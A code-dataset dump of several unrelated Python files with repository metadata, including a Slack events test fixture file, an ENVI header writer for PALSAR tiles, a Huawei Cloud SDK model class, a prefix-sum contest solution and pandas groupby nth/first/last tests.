a5a542483967e09f9001092e2c3d0033fe79a9f2
| 1,878
|
py
|
Python
|
tests/conftest.py
|
haeena/python-slack-events-api-asgi
|
6f4f0b207707468d10f165ba90c775bb7defd00e
|
[
"MIT"
] | 2
|
2020-01-16T04:23:43.000Z
|
2020-09-04T23:47:35.000Z
|
tests/conftest.py
|
haeena/python-slack-events-api-asgi
|
6f4f0b207707468d10f165ba90c775bb7defd00e
|
[
"MIT"
] | 2
|
2020-01-14T17:05:29.000Z
|
2020-01-29T20:06:38.000Z
|
tests/conftest.py
|
haeena/slackevent-responder
|
6f4f0b207707468d10f165ba90c775bb7defd00e
|
[
"MIT"
] | null | null | null |
import random
import unicodedata
import pytest
from slackevent_responder import SlackEventApp
from .helpers.helpers import create_signature, load_event_fixture
@pytest.fixture(scope="session")
def signing_secret():
# I'm not completely sure, but it seems to be something like...
ss_letters = "0123456789abcdef"
ss_length = 32
signing_secret = "".join(
random.choice(ss_letters) for i in range(ss_length)
)
return signing_secret
@pytest.fixture(scope="session")
def slack_event_path():
return "/slack/events"
@pytest.fixture(scope="function")
def app(signing_secret, slack_event_path):
app = SlackEventApp(
slack_signing_secret=signing_secret, path=slack_event_path
)
return app
@pytest.fixture(scope="session", params=["correct", "incorrect"])
def verify_signatures_fixture(request, signing_secret):
if request.param == "incorrect":
return (
False,
"",
"",
"",
"v0=0000000000000000000000000000000000000000000000000000000000000000",
)
# randomize
unicode_glyphs = "".join(
chr(c)
for c in range(65533)
# use the unicode categories that don't include control codes
if unicodedata.category(chr(c))[0] in ("LMNPSZ")
)
max_data_length = 1024
timestamp = str(random.randint(0, 2 ** 31 - 1))
data = "".join(
random.choice(unicode_glyphs)
for i in range(random.randint(0, max_data_length))
)
request_signature = create_signature(signing_secret, timestamp, data)
return (True, signing_secret, timestamp, data, request_signature)
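# For reference, a minimal sketch of what the imported create_signature helper presumably
# computes (the real implementation lives in .helpers.helpers and may differ): Slack's v0
# request signing is an HMAC-SHA256 of "v0:<timestamp>:<body>" keyed with the signing
# secret, hex-encoded and prefixed with "v0=".
def _example_create_signature(secret: str, timestamp: str, body: str) -> str:
    import hashlib
    import hmac
    basestring = f"v0:{timestamp}:{body}".encode("utf-8")
    digest = hmac.new(secret.encode("utf-8"), basestring, hashlib.sha256).hexdigest()
    return f"v0={digest}"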
@pytest.fixture
def reaction_event_fixture():
return load_event_fixture("reaction_added", as_string=False)
@pytest.fixture
def url_challenge_fixture():
return load_event_fixture("url_challenge", as_string=False)
| 25.726027
| 82
| 0.687433
|
0ee45e2aff32ac359ff272f10427bf0ce34c60b7
| 3,277
|
py
|
Python
|
OddsAndEnds/ALOSPALSARTiles/addENVIHeader_GMW_ScanSAR.py
|
petebunting/rsgis_scripts
|
b35b0403cdfad6c63824d4f8c038f190cdb5978d
|
[
"MIT"
] | 4
|
2020-09-16T10:45:15.000Z
|
2021-05-06T04:34:32.000Z
|
OddsAndEnds/ALOSPALSARTiles/addENVIHeader_GMW_ScanSAR.py
|
petebunting/rsgis_scripts
|
b35b0403cdfad6c63824d4f8c038f190cdb5978d
|
[
"MIT"
] | null | null | null |
OddsAndEnds/ALOSPALSARTiles/addENVIHeader_GMW_ScanSAR.py
|
petebunting/rsgis_scripts
|
b35b0403cdfad6c63824d4f8c038f190cdb5978d
|
[
"MIT"
] | 2
|
2020-07-06T18:03:40.000Z
|
2022-02-15T12:45:34.000Z
|
#! /usr/bin/env python
"""
add_gmw_palsar_header.py
Adds ENVI header file to Global Mangrove Watch
format PALSAR FBD files.
Dan Clewley
"""
from __future__ import print_function
import os
import sys
import re
import glob
import argparse
def create_envi_headers(inFileDIR):
"""
Create ENVI header
for all files
"""
# Change to input directory
os.chdir(inFileDIR)
try:
inHHFile = glob.glob('*HH')[0]
inDateFile = glob.glob('*_date')[0]
inIncFile = glob.glob('*_linci')[0]
inMaskFile = glob.glob('*_mask')[0]
inHeaderFile = glob.glob('KC*.hdr')[0]
except IndexError:
print('Not all expected files were found in input directory')
print('Found:')
all_files = os.listdir(inFileDIR)
print('\n'.join(all_files))
raise
inHHHeaderFile = inHHFile + '.hdr'
inDateHeaderFile = inDateFile + '.hdr'
inIncHeaderFile = inIncFile + '.hdr'
inMaskHeaderFile = inMaskFile + '.hdr'
inHeader = open(inHeaderFile, 'r')
inHHHeader = open(inHHHeaderFile, 'w')
inDateHeader = open(inDateHeaderFile,'w')
inIncHeader = open(inIncHeaderFile,'w')
inMaskHeader = open(inMaskHeaderFile,'w')
    inULon = ''
inULat = ''
i = 1
for line in inHeader:
if i == 13:
inULat = line.strip()
elif i == 14:
inULon = line.strip()
i+=1
inULat = str(int(inULat) * 3600)
inULon = str(int(inULon) * 3600)
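    # The corner coordinates read from the KC header appear to be in whole degrees;
    # multiplying by 3600 converts them to seconds of arc, matching the
    # "units=Seconds" entry in the ENVI map info written below.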
print(inULat)
print(inULon)
headerText = '''ENVI
description = {{
{} }}
samples = 1200
lines = 1200
bands = 1
header offset = 0
file type = ENVI Standard
data type = 12
interleave = bsq
sensor type = Unknown
byte order = 0
map info = {{ Geographic Lat/Lon, 1.0000, 1.0000, {}, {}, 32.0000000000e-01, 32.0000000000e-01, WGS-84, units=Seconds }}
wavelength units = Unknown
'''.format(inHeaderFile, inULon, inULat)
headerTextByte = '''ENVI
description = {{
{} }}
samples = 1200
lines = 1200
bands = 1
header offset = 0
file type = ENVI Standard
data type = 1
interleave = bsq
sensor type = Unknown
byte order = 0
map info = {{ Geographic Lat/Lon, 1.0000, 1.0000, {}, {}, 32.0000000000e-01, 32.0000000000e-01, WGS-84, units=Seconds}}
wavelength units = Unknown
''' .format(inHeaderFile, inULon, inULat)
inHHHeader.write(headerText)
inDateHeader.write(headerText)
inIncHeader.write(headerTextByte)
inMaskHeader.write(headerTextByte)
inHeader.close()
inHHHeader.close()
inDateHeader.close()
inIncHeader.close()
inMaskHeader.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create ENVI header files for GMW PALSAR Tiles')
parser.add_argument('-d', "--tiledirs", nargs='+',type=str, help="Input directory(s)")
args=parser.parse_args()
# Get absolute path
tile_dir_paths = [os.path.abspath(tile) for tile in args.tiledirs]
for tile_dir in tile_dir_paths:
if os.path.isdir(tile_dir):
try:
create_envi_headers(tile_dir)
print('Added headers for {}'.format(os.path.split(tile_dir)[-1]))
except Exception:
print('ERROR: No headers created for {}'.format(tile_dir), file=sys.stderr)
| 26.216
| 120
| 0.639609
|
10e462b6dd5ddb8328a2598ce44333f54990c567
| 3,714
|
py
|
Python
|
huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/show_online_meeting_detail_response.py
|
githubmilesma/huaweicloud-sdk-python-v3
|
9d9449ed68a609ca65f0aa50b5b2a1c28445bf03
|
[
"Apache-2.0"
] | 1
|
2021-04-16T07:59:28.000Z
|
2021-04-16T07:59:28.000Z
|
huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/show_online_meeting_detail_response.py
|
Lencof/huaweicloud-sdk-python-v3
|
d13dc4e2830a83e295be6e4de021999b3376e34e
|
[
"Apache-2.0"
] | null | null | null |
huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/show_online_meeting_detail_response.py
|
Lencof/huaweicloud-sdk-python-v3
|
d13dc4e2830a83e295be6e4de021999b3376e34e
|
[
"Apache-2.0"
] | 1
|
2022-01-17T02:24:18.000Z
|
2022-01-17T02:24:18.000Z
|
# coding: utf-8
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowOnlineMeetingDetailResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'conference_data': 'ConferenceInfo',
'data': 'PageParticipant'
}
attribute_map = {
'conference_data': 'conferenceData',
'data': 'data'
}
def __init__(self, conference_data=None, data=None):
"""ShowOnlineMeetingDetailResponse - a model defined in huaweicloud sdk"""
super().__init__()
self._conference_data = None
self._data = None
self.discriminator = None
if conference_data is not None:
self.conference_data = conference_data
if data is not None:
self.data = data
@property
def conference_data(self):
"""Gets the conference_data of this ShowOnlineMeetingDetailResponse.
:return: The conference_data of this ShowOnlineMeetingDetailResponse.
:rtype: ConferenceInfo
"""
return self._conference_data
@conference_data.setter
def conference_data(self, conference_data):
"""Sets the conference_data of this ShowOnlineMeetingDetailResponse.
:param conference_data: The conference_data of this ShowOnlineMeetingDetailResponse.
:type: ConferenceInfo
"""
self._conference_data = conference_data
@property
def data(self):
"""Gets the data of this ShowOnlineMeetingDetailResponse.
:return: The data of this ShowOnlineMeetingDetailResponse.
:rtype: PageParticipant
"""
return self._data
@data.setter
def data(self, data):
"""Sets the data of this ShowOnlineMeetingDetailResponse.
:param data: The data of this ShowOnlineMeetingDetailResponse.
:type: PageParticipant
"""
self._data = data
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowOnlineMeetingDetailResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 27.716418
| 92
| 0.585353
|
dee735e19b2d453b9c5faf07b665b5a11aa801c3
| 456
|
py
|
Python
|
others/typical90/typical90j.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | 1
|
2019-08-21T00:49:34.000Z
|
2019-08-21T00:49:34.000Z
|
others/typical90/typical90j.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | null | null | null |
others/typical90/typical90j.py
|
c-yan/atcoder
|
940e49d576e6a2d734288fadaf368e486480a948
|
[
"MIT"
] | null | null | null |
from sys import stdin
from itertools import accumulate
readline = stdin.readline
N = int(readline())
a = [[0] * (N + 1) for _ in range(2)]
for i in range(N):
C, P = map(int, readline().split())
a[C - 1][i + 1] = P
a = [list(accumulate(x)) for x in a]
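# After accumulation, a[c][i] is the prefix sum of scores for class c + 1 over the first i
# problems, so each query below is answered in O(1) as a[c][B] - a[c][A - 1].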
Q = int(readline())
result = []
for _ in range(Q):
A, B = map(int, readline().split())
result.append('%d %d' % (a[0][B] - a[0][A - 1], a[1][B] - a[1][A - 1]))
print(*result, sep='\n')
| 21.714286
| 75
| 0.552632
|
a6d48ebc86eb92488fda6ed4d879cb254d1d5f78
| 249
|
py
|
Python
|
tests/test_console.py
|
benjmcarr/hypermodern-ben
|
415cb323c4cd901547a15c66aef3cb9e02f3a33c
|
[
"MIT"
] | null | null | null |
tests/test_console.py
|
benjmcarr/hypermodern-ben
|
415cb323c4cd901547a15c66aef3cb9e02f3a33c
|
[
"MIT"
] | null | null | null |
tests/test_console.py
|
benjmcarr/hypermodern-ben
|
415cb323c4cd901547a15c66aef3cb9e02f3a33c
|
[
"MIT"
] | null | null | null |
import click.testing
import pytest
from hypermodern_ben import console
@pytest.fixture
def runner():
return click.testing.CliRunner()
def test_main_succeeds(runner):
result = runner.invoke(console.main)
assert result.exit_code == 0
| 16.6
| 40
| 0.759036
|
8742135da59e5f509a934bd19e78cd4e6a23263e
| 22,749
|
py
|
Python
|
pandas/tests/groupby/test_nth.py
|
tyvich/pandas
|
22de58e63f9271d4ddb2bf49d008c5a9550c5cc4
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/groupby/test_nth.py
|
tyvich/pandas
|
22de58e63f9271d4ddb2bf49d008c5a9550c5cc4
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/groupby/test_nth.py
|
tyvich/pandas
|
22de58e63f9271d4ddb2bf49d008c5a9550c5cc4
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import pytest
import pandas as pd
from pandas import (
DataFrame,
Index,
MultiIndex,
Series,
Timestamp,
isna,
)
import pandas._testing as tm
def test_first_last_nth(df):
# tests for first / last / nth
grouped = df.groupby("A")
first = grouped.first()
expected = df.loc[[1, 0], ["B", "C", "D"]]
expected.index = Index(["bar", "foo"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(first, expected)
nth = grouped.nth(0)
tm.assert_frame_equal(nth, expected)
last = grouped.last()
expected = df.loc[[5, 7], ["B", "C", "D"]]
expected.index = Index(["bar", "foo"], name="A")
tm.assert_frame_equal(last, expected)
nth = grouped.nth(-1)
tm.assert_frame_equal(nth, expected)
nth = grouped.nth(1)
expected = df.loc[[2, 3], ["B", "C", "D"]].copy()
expected.index = Index(["foo", "bar"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(nth, expected)
# it works!
grouped["B"].first()
grouped["B"].last()
grouped["B"].nth(0)
df.loc[df["A"] == "foo", "B"] = np.nan
assert isna(grouped["B"].first()["foo"])
assert isna(grouped["B"].last()["foo"])
assert isna(grouped["B"].nth(0)["foo"])
# v0.14.0 whatsnew
df = DataFrame([[1, np.nan], [1, 4], [5, 6]], columns=["A", "B"])
g = df.groupby("A")
result = g.first()
expected = df.iloc[[1, 2]].set_index("A")
tm.assert_frame_equal(result, expected)
expected = df.iloc[[1, 2]].set_index("A")
result = g.nth(0, dropna="any")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("method", ["first", "last"])
def test_first_last_with_na_object(method, nulls_fixture):
# https://github.com/pandas-dev/pandas/issues/32123
groups = DataFrame({"a": [1, 1, 2, 2], "b": [1, 2, 3, nulls_fixture]}).groupby("a")
result = getattr(groups, method)()
if method == "first":
values = [1, 3]
else:
values = [2, 3]
values = np.array(values, dtype=result["b"].dtype)
idx = Index([1, 2], name="a")
expected = DataFrame({"b": values}, index=idx)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index", [0, -1])
def test_nth_with_na_object(index, nulls_fixture):
# https://github.com/pandas-dev/pandas/issues/32123
groups = DataFrame({"a": [1, 1, 2, 2], "b": [1, 2, 3, nulls_fixture]}).groupby("a")
result = groups.nth(index)
if index == 0:
values = [1, 3]
else:
values = [2, nulls_fixture]
values = np.array(values, dtype=result["b"].dtype)
idx = Index([1, 2], name="a")
expected = DataFrame({"b": values}, index=idx)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("method", ["first", "last"])
def test_first_last_with_None(method):
# https://github.com/pandas-dev/pandas/issues/32800
# None should be preserved as object dtype
df = DataFrame.from_dict({"id": ["a"], "value": [None]})
groups = df.groupby("id", as_index=False)
result = getattr(groups, method)()
tm.assert_frame_equal(result, df)
@pytest.mark.parametrize("method", ["first", "last"])
@pytest.mark.parametrize(
"df, expected",
[
(
DataFrame({"id": "a", "value": [None, "foo", np.nan]}),
DataFrame({"value": ["foo"]}, index=Index(["a"], name="id")),
),
(
DataFrame({"id": "a", "value": [np.nan]}, dtype=object),
DataFrame({"value": [None]}, index=Index(["a"], name="id")),
),
],
)
def test_first_last_with_None_expanded(method, df, expected):
# GH 32800, 38286
result = getattr(df.groupby("id"), method)()
tm.assert_frame_equal(result, expected)
def test_first_last_nth_dtypes(df_mixed_floats):
df = df_mixed_floats.copy()
df["E"] = True
df["F"] = 1
# tests for first / last / nth
grouped = df.groupby("A")
first = grouped.first()
expected = df.loc[[1, 0], ["B", "C", "D", "E", "F"]]
expected.index = Index(["bar", "foo"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(first, expected)
last = grouped.last()
expected = df.loc[[5, 7], ["B", "C", "D", "E", "F"]]
expected.index = Index(["bar", "foo"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(last, expected)
nth = grouped.nth(1)
expected = df.loc[[3, 2], ["B", "C", "D", "E", "F"]]
expected.index = Index(["bar", "foo"], name="A")
expected = expected.sort_index()
tm.assert_frame_equal(nth, expected)
# GH 2763, first/last shifting dtypes
idx = list(range(10))
idx.append(9)
s = Series(data=range(11), index=idx, name="IntCol")
assert s.dtype == "int64"
f = s.groupby(level=0).first()
assert f.dtype == "int64"
def test_first_last_nth_nan_dtype():
# GH 33591
df = DataFrame({"data": ["A"], "nans": Series([np.nan], dtype=object)})
grouped = df.groupby("data")
expected = df.set_index("data").nans
tm.assert_series_equal(grouped.nans.first(), expected)
tm.assert_series_equal(grouped.nans.last(), expected)
tm.assert_series_equal(grouped.nans.nth(-1), expected)
tm.assert_series_equal(grouped.nans.nth(0), expected)
def test_first_strings_timestamps():
# GH 11244
test = DataFrame(
{
Timestamp("2012-01-01 00:00:00"): ["a", "b"],
Timestamp("2012-01-02 00:00:00"): ["c", "d"],
"name": ["e", "e"],
"aaaa": ["f", "g"],
}
)
result = test.groupby("name").first()
expected = DataFrame(
[["a", "c", "f"]],
columns=Index([Timestamp("2012-01-01"), Timestamp("2012-01-02"), "aaaa"]),
index=Index(["e"], name="name"),
)
tm.assert_frame_equal(result, expected)
def test_nth():
df = DataFrame([[1, np.nan], [1, 4], [5, 6]], columns=["A", "B"])
g = df.groupby("A")
tm.assert_frame_equal(g.nth(0), df.iloc[[0, 2]].set_index("A"))
tm.assert_frame_equal(g.nth(1), df.iloc[[1]].set_index("A"))
tm.assert_frame_equal(g.nth(2), df.loc[[]].set_index("A"))
tm.assert_frame_equal(g.nth(-1), df.iloc[[1, 2]].set_index("A"))
tm.assert_frame_equal(g.nth(-2), df.iloc[[0]].set_index("A"))
tm.assert_frame_equal(g.nth(-3), df.loc[[]].set_index("A"))
tm.assert_series_equal(g.B.nth(0), df.set_index("A").B.iloc[[0, 2]])
tm.assert_series_equal(g.B.nth(1), df.set_index("A").B.iloc[[1]])
tm.assert_frame_equal(g[["B"]].nth(0), df.loc[[0, 2], ["A", "B"]].set_index("A"))
exp = df.set_index("A")
tm.assert_frame_equal(g.nth(0, dropna="any"), exp.iloc[[1, 2]])
tm.assert_frame_equal(g.nth(-1, dropna="any"), exp.iloc[[1, 2]])
exp["B"] = np.nan
tm.assert_frame_equal(g.nth(7, dropna="any"), exp.iloc[[1, 2]])
tm.assert_frame_equal(g.nth(2, dropna="any"), exp.iloc[[1, 2]])
# out of bounds, regression from 0.13.1
# GH 6621
df = DataFrame(
{
"color": {0: "green", 1: "green", 2: "red", 3: "red", 4: "red"},
"food": {0: "ham", 1: "eggs", 2: "eggs", 3: "ham", 4: "pork"},
"two": {
0: 1.5456590000000001,
1: -0.070345000000000005,
2: -2.4004539999999999,
3: 0.46206000000000003,
4: 0.52350799999999997,
},
"one": {
0: 0.56573799999999996,
1: -0.9742360000000001,
2: 1.033801,
3: -0.78543499999999999,
4: 0.70422799999999997,
},
}
).set_index(["color", "food"])
result = df.groupby(level=0, as_index=False).nth(2)
expected = df.iloc[[-1]]
tm.assert_frame_equal(result, expected)
result = df.groupby(level=0, as_index=False).nth(3)
expected = df.loc[[]]
tm.assert_frame_equal(result, expected)
# GH 7559
# from the vbench
df = DataFrame(np.random.randint(1, 10, (100, 2)), dtype="int64")
s = df[1]
g = df[0]
expected = s.groupby(g).first()
expected2 = s.groupby(g).apply(lambda x: x.iloc[0])
tm.assert_series_equal(expected2, expected, check_names=False)
assert expected.name == 1
assert expected2.name == 1
# validate first
v = s[g == 1].iloc[0]
assert expected.iloc[0] == v
assert expected2.iloc[0] == v
# this is NOT the same as .first (as sorted is default!)
# as it keeps the order in the series (and not the group order)
# related GH 7287
expected = s.groupby(g, sort=False).first()
result = s.groupby(g, sort=False).nth(0, dropna="all")
tm.assert_series_equal(result, expected)
with pytest.raises(ValueError, match="For a DataFrame groupby"):
s.groupby(g, sort=False).nth(0, dropna=True)
# doc example
df = DataFrame([[1, np.nan], [1, 4], [5, 6]], columns=["A", "B"])
g = df.groupby("A")
result = g.B.nth(0, dropna="all")
expected = g.B.first()
tm.assert_series_equal(result, expected)
# test multiple nth values
df = DataFrame([[1, np.nan], [1, 3], [1, 4], [5, 6], [5, 7]], columns=["A", "B"])
g = df.groupby("A")
tm.assert_frame_equal(g.nth(0), df.iloc[[0, 3]].set_index("A"))
tm.assert_frame_equal(g.nth([0]), df.iloc[[0, 3]].set_index("A"))
tm.assert_frame_equal(g.nth([0, 1]), df.iloc[[0, 1, 3, 4]].set_index("A"))
tm.assert_frame_equal(g.nth([0, -1]), df.iloc[[0, 2, 3, 4]].set_index("A"))
tm.assert_frame_equal(g.nth([0, 1, 2]), df.iloc[[0, 1, 2, 3, 4]].set_index("A"))
tm.assert_frame_equal(g.nth([0, 1, -1]), df.iloc[[0, 1, 2, 3, 4]].set_index("A"))
tm.assert_frame_equal(g.nth([2]), df.iloc[[2]].set_index("A"))
tm.assert_frame_equal(g.nth([3, 4]), df.loc[[]].set_index("A"))
business_dates = pd.date_range(start="4/1/2014", end="6/30/2014", freq="B")
df = DataFrame(1, index=business_dates, columns=["a", "b"])
# get the first, fourth and last two business days for each month
key = [df.index.year, df.index.month]
result = df.groupby(key, as_index=False).nth([0, 3, -2, -1])
expected_dates = pd.to_datetime(
[
"2014/4/1",
"2014/4/4",
"2014/4/29",
"2014/4/30",
"2014/5/1",
"2014/5/6",
"2014/5/29",
"2014/5/30",
"2014/6/2",
"2014/6/5",
"2014/6/27",
"2014/6/30",
]
)
expected = DataFrame(1, columns=["a", "b"], index=expected_dates)
tm.assert_frame_equal(result, expected)
def test_nth_multi_index(three_group):
# PR 9090, related to issue 8979
# test nth on MultiIndex, should match .first()
grouped = three_group.groupby(["A", "B"])
result = grouped.nth(0)
expected = grouped.first()
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"data, expected_first, expected_last",
[
(
{
"id": ["A"],
"time": Timestamp("2012-02-01 14:00:00", tz="US/Central"),
"foo": [1],
},
{
"id": ["A"],
"time": Timestamp("2012-02-01 14:00:00", tz="US/Central"),
"foo": [1],
},
{
"id": ["A"],
"time": Timestamp("2012-02-01 14:00:00", tz="US/Central"),
"foo": [1],
},
),
(
{
"id": ["A", "B", "A"],
"time": [
Timestamp("2012-01-01 13:00:00", tz="America/New_York"),
Timestamp("2012-02-01 14:00:00", tz="US/Central"),
Timestamp("2012-03-01 12:00:00", tz="Europe/London"),
],
"foo": [1, 2, 3],
},
{
"id": ["A", "B"],
"time": [
Timestamp("2012-01-01 13:00:00", tz="America/New_York"),
Timestamp("2012-02-01 14:00:00", tz="US/Central"),
],
"foo": [1, 2],
},
{
"id": ["A", "B"],
"time": [
Timestamp("2012-03-01 12:00:00", tz="Europe/London"),
Timestamp("2012-02-01 14:00:00", tz="US/Central"),
],
"foo": [3, 2],
},
),
],
)
def test_first_last_tz(data, expected_first, expected_last):
# GH15884
# Test that the timezone is retained when calling first
# or last on groupby with as_index=False
df = DataFrame(data)
result = df.groupby("id", as_index=False).first()
expected = DataFrame(expected_first)
cols = ["id", "time", "foo"]
tm.assert_frame_equal(result[cols], expected[cols])
result = df.groupby("id", as_index=False)["time"].first()
tm.assert_frame_equal(result, expected[["id", "time"]])
result = df.groupby("id", as_index=False).last()
expected = DataFrame(expected_last)
cols = ["id", "time", "foo"]
tm.assert_frame_equal(result[cols], expected[cols])
result = df.groupby("id", as_index=False)["time"].last()
tm.assert_frame_equal(result, expected[["id", "time"]])
@pytest.mark.parametrize(
"method, ts, alpha",
[
["first", Timestamp("2013-01-01", tz="US/Eastern"), "a"],
["last", Timestamp("2013-01-02", tz="US/Eastern"), "b"],
],
)
def test_first_last_tz_multi_column(method, ts, alpha):
# GH 21603
category_string = Series(list("abc")).astype("category")
df = DataFrame(
{
"group": [1, 1, 2],
"category_string": category_string,
"datetimetz": pd.date_range("20130101", periods=3, tz="US/Eastern"),
}
)
result = getattr(df.groupby("group"), method)()
expected = DataFrame(
{
"category_string": pd.Categorical(
[alpha, "c"], dtype=category_string.dtype
),
"datetimetz": [ts, Timestamp("2013-01-03", tz="US/Eastern")],
},
index=Index([1, 2], name="group"),
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"values",
[
pd.array([True, False], dtype="boolean"),
pd.array([1, 2], dtype="Int64"),
pd.to_datetime(["2020-01-01", "2020-02-01"]),
pd.to_timedelta([1, 2], unit="D"),
],
)
@pytest.mark.parametrize("function", ["first", "last", "min", "max"])
def test_first_last_extension_array_keeps_dtype(values, function):
# https://github.com/pandas-dev/pandas/issues/33071
# https://github.com/pandas-dev/pandas/issues/32194
df = DataFrame({"a": [1, 2], "b": values})
grouped = df.groupby("a")
idx = Index([1, 2], name="a")
expected_series = Series(values, name="b", index=idx)
expected_frame = DataFrame({"b": values}, index=idx)
result_series = getattr(grouped["b"], function)()
tm.assert_series_equal(result_series, expected_series)
result_frame = grouped.agg({"b": function})
tm.assert_frame_equal(result_frame, expected_frame)
def test_nth_multi_index_as_expected():
# PR 9090, related to issue 8979
# test nth on MultiIndex
three_group = DataFrame(
{
"A": [
"foo",
"foo",
"foo",
"foo",
"bar",
"bar",
"bar",
"bar",
"foo",
"foo",
"foo",
],
"B": [
"one",
"one",
"one",
"two",
"one",
"one",
"one",
"two",
"two",
"two",
"one",
],
"C": [
"dull",
"dull",
"shiny",
"dull",
"dull",
"shiny",
"shiny",
"dull",
"shiny",
"shiny",
"shiny",
],
}
)
grouped = three_group.groupby(["A", "B"])
result = grouped.nth(0)
expected = DataFrame(
{"C": ["dull", "dull", "dull", "dull"]},
index=MultiIndex.from_arrays(
[["bar", "bar", "foo", "foo"], ["one", "two", "one", "two"]],
names=["A", "B"],
),
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"op, n, expected_rows",
[
("head", -1, []),
("head", 0, []),
("head", 1, [0, 2]),
("head", 7, [0, 1, 2]),
("tail", -1, []),
("tail", 0, []),
("tail", 1, [1, 2]),
("tail", 7, [0, 1, 2]),
],
)
@pytest.mark.parametrize("columns", [None, [], ["A"], ["B"], ["A", "B"]])
@pytest.mark.parametrize("as_index", [True, False])
def test_groupby_head_tail(op, n, expected_rows, columns, as_index):
df = DataFrame([[1, 2], [1, 4], [5, 6]], columns=["A", "B"])
g = df.groupby("A", as_index=as_index)
expected = df.iloc[expected_rows]
if columns is not None:
g = g[columns]
expected = expected[columns]
result = getattr(g, op)(n)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"op, n, expected_cols",
[
("head", -1, []),
("head", 0, []),
("head", 1, [0, 2]),
("head", 7, [0, 1, 2]),
("tail", -1, []),
("tail", 0, []),
("tail", 1, [1, 2]),
("tail", 7, [0, 1, 2]),
],
)
def test_groupby_head_tail_axis_1(op, n, expected_cols):
# GH 9772
df = DataFrame(
[[1, 2, 3], [1, 4, 5], [2, 6, 7], [3, 8, 9]], columns=["A", "B", "C"]
)
g = df.groupby([0, 0, 1], axis=1)
expected = df.iloc[:, expected_cols]
result = getattr(g, op)(n)
tm.assert_frame_equal(result, expected)
def test_group_selection_cache():
# GH 12839 nth, head, and tail should return same result consistently
df = DataFrame([[1, 2], [1, 4], [5, 6]], columns=["A", "B"])
expected = df.iloc[[0, 2]].set_index("A")
g = df.groupby("A")
result1 = g.head(n=2)
result2 = g.nth(0)
tm.assert_frame_equal(result1, df)
tm.assert_frame_equal(result2, expected)
g = df.groupby("A")
result1 = g.tail(n=2)
result2 = g.nth(0)
tm.assert_frame_equal(result1, df)
tm.assert_frame_equal(result2, expected)
g = df.groupby("A")
result1 = g.nth(0)
result2 = g.head(n=2)
tm.assert_frame_equal(result1, expected)
tm.assert_frame_equal(result2, df)
g = df.groupby("A")
result1 = g.nth(0)
result2 = g.tail(n=2)
tm.assert_frame_equal(result1, expected)
tm.assert_frame_equal(result2, df)
def test_nth_empty():
# GH 16064
df = DataFrame(index=[0], columns=["a", "b", "c"])
result = df.groupby("a").nth(10)
expected = DataFrame(index=Index([], name="a"), columns=["b", "c"])
tm.assert_frame_equal(result, expected)
result = df.groupby(["a", "b"]).nth(10)
expected = DataFrame(
index=MultiIndex([[], []], [[], []], names=["a", "b"]), columns=["c"]
)
tm.assert_frame_equal(result, expected)
def test_nth_column_order():
# GH 20760
# Check that nth preserves column order
df = DataFrame(
[[1, "b", 100], [1, "a", 50], [1, "a", np.nan], [2, "c", 200], [2, "d", 150]],
columns=["A", "C", "B"],
)
result = df.groupby("A").nth(0)
expected = DataFrame(
[["b", 100.0], ["c", 200.0]], columns=["C", "B"], index=Index([1, 2], name="A")
)
tm.assert_frame_equal(result, expected)
result = df.groupby("A").nth(-1, dropna="any")
expected = DataFrame(
[["a", 50.0], ["d", 150.0]], columns=["C", "B"], index=Index([1, 2], name="A")
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("dropna", [None, "any", "all"])
def test_nth_nan_in_grouper(dropna):
# GH 26011
df = DataFrame(
[[np.nan, 0, 1], ["abc", 2, 3], [np.nan, 4, 5], ["def", 6, 7], [np.nan, 8, 9]],
columns=list("abc"),
)
result = df.groupby("a").nth(0, dropna=dropna)
expected = DataFrame(
[[2, 3], [6, 7]], columns=list("bc"), index=Index(["abc", "def"], name="a")
)
tm.assert_frame_equal(result, expected)
